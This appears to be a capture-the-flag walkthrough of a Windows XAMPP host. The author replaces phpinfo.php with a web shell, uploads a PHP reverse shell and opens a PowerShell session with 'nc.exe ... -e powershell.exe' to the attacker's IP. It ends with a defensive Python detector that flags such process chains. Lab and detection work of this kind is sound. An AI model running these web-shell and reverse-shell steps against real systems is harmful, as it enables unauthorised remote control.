6 :45332 :45443 QuizApp

# just another rails project
# but it also serves phpinfo.php, which loads fine

http://192.168.154.127:45443/phpinfo.php
System 	Windows NT MEDJED 10.0 build 18363 (Windows 10) AMD64
Architecture 	x64 
Loaded Configuration File 	C:\xampp\php\php.ini 
SCRIPT_FILENAME 	C:/xampp/htdocs/phpinfo.php 

# now we know where this file is and that it's loading properly
# as we have r/w perms via Barracuda Web-File-Server
# modify phpinfo.php > webshell

http://192.168.154.127:45443/phpinfo.php
# received web shell
CMD: whoami && whoami /priv

whoami && whoami /priv
medjed\jerren

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

# time to get reverse shell
# uploading shell.php
# 6969 failed, using 445

http://192.168.154.127:45443/shell.php

$ rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [192.168.49.154] from (UNKNOWN) [192.168.154.127] 51247
SOCKET: Shell has connected! PID: 6136
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs> whoami
medjed\jerren

# got PS shell using 
CMD: nc.exe 192.168.49.154 45443 -e powershell.exe
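As an added defender-side example (not part of these notes), a small Python check that flags the process-creation pattern the steps above produce: XAMPP's httpd.exe spawning cmd/powershell, or a netcat-style `-e` shell. The events are constructed in the shape of Sysmon Event ID 1 fields, and the web-root path is an assumption taken from the phpinfo output.

```python
import re

# Web server images (XAMPP's Apache/PHP, plus IIS) that should never have an
# interactive shell as a direct child.
WEB_SERVER_PARENTS = {"httpd.exe", "apache.exe", "php-cgi.exe", "php.exe", "w3wp.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# netcat-style "-e <shell>" as seen in the reverse shell command above
NC_EXEC_RE = re.compile(r"\s-e\s+(?:\S*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
# assumption: the XAMPP web root shown in phpinfo is the only web root to watch
WEBROOT_MARKER = "\\xampp\\htdocs\\"

# Constructed sample events in Sysmon Event ID 1 field names (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami && whoami /priv", "User": r"MEDJED\jerren"},
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe", "Image": r"C:\xampp\htdocs\nc.exe",
     "CommandLine": "nc.exe 192.168.49.154 45443 -e powershell.exe", "User": r"MEDJED\jerren"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe", "User": r"MEDJED\jerren"},
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe", "Image": r"C:\xampp\php\php-cgi.exe",
     "CommandLine": "php-cgi.exe", "User": r"MEDJED\jerren"},
]


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_event(event):
    """Return the reasons an event is suspicious (empty list if benign)."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    reasons = []
    if parent in WEB_SERVER_PARENTS and image in SHELL_IMAGES:
        reasons.append(f"web server {parent} spawned shell {image}")
    if parent in WEB_SERVER_PARENTS and NC_EXEC_RE.search(event.get("CommandLine", "")):
        reasons.append("netcat-style '-e' shell launched from web server")
    if WEBROOT_MARKER in event.get("Image", "").lower():
        reasons.append("executable launched from the web root")
    return reasons


def scan(events):
    """Map event index -> reasons for every flagged event."""
    return {i: r for i, e in enumerate(events) if (r := flag_event(e))}


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["User"], "|", "; ".join(why))
```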
